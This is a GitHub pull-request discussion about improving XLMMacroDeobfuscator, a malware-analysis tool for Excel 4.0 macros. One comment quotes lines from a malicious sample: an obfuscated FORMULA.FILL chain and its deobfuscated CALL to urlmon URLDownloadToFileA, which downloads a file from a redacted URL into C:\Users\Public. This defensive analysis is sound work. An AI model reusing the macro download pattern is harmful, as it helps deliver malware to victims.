Add GET.WINDOW, add cmpops lt and gt

DissectMalware / XLMMacroDeobfuscator

Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros)

Apache License 2.0

568 stars 115 forks source link

Add GET.WINDOW, add cmpops lt and gt #22

Closed spencerwp closed 4 years ago

spencerwp commented 4 years ago

Add empty window defaults and GET.WINDOW support. Add comparison operators < and >.

Add _cell_defaults.

Rename defauls to defaults.

spencerwp commented 4 years ago

For some reason the return for comparison from GET.WINDOW only ever came back as a float if the "text" field was set to the response value from get_window

DissectMalware commented 4 years ago

Seem get_cell.conf is not added and committed.

Are you going to use it for missing cell formatting info?

spencerwp commented 4 years ago

The get_cell.conf was already in there, but loading was overwriting the workspace_defaults, fixed var name only.

DissectMalware commented 4 years ago

My bad, I forgot I added it!

spencerwp commented 4 years ago

I added another change to allow re-parsing of formulas that were filled by FORMULA.FILL(CHAR(xx)&CHAR(xx)&(CHAR(xx)) methods. This will happen in evaluate_parse_tree only when cell.value is None.

doomedraven commented 4 years ago

ah nice, i had opened issue to ask about this char thing

DissectMalware commented 4 years ago

This is true for FORMULA as well: if the destination is not set then it will set the next cell I guess

Are we talking about FORMULA.FILL having only one argument?

Or you are pointing to something else?

Oh I get what you are saying. You are saying if the cell accessed, we need to also evaluate the formula. But when we access a formula, we get its value. The formula shouldn't be executed at this point. Only when the interpreter process the cell, the macro should be evaluated

spencerwp commented 4 years ago

Sorry, nothing to do with one argument.

I saw a problem where this

=FORMULA.FILL(CHAR(CO14877/BF53864)&CHAR(HF51138*GU60692)&CHAR(BJ47128-IR50627)&CHAR(CO14877-FB3970)&.....&CHAR(FJ58289+FL28871),GK50662)

will become this

CELL:IE62618 , FullEvaluation , FORMULA.FILL("=""C:\Users\Public\EIKiJM.html""",Sheet2!GK50662)

Then another function will try to reference the string by cell, GK50662, and it will find the cell.value is not set, only the cell.formula. So this change can re-evaluate the formula even if there was not a GOTO GK50662 before its use.

I used to get

CELL:FJ4659 , NotImplemented , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,CD53145,GK50662,0,0)

Now I get

CELL:FJ4659 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://xxx/xxx.php","C:\Users\Public\EIKiJM.html",0,0)

Maybe strings are a special case?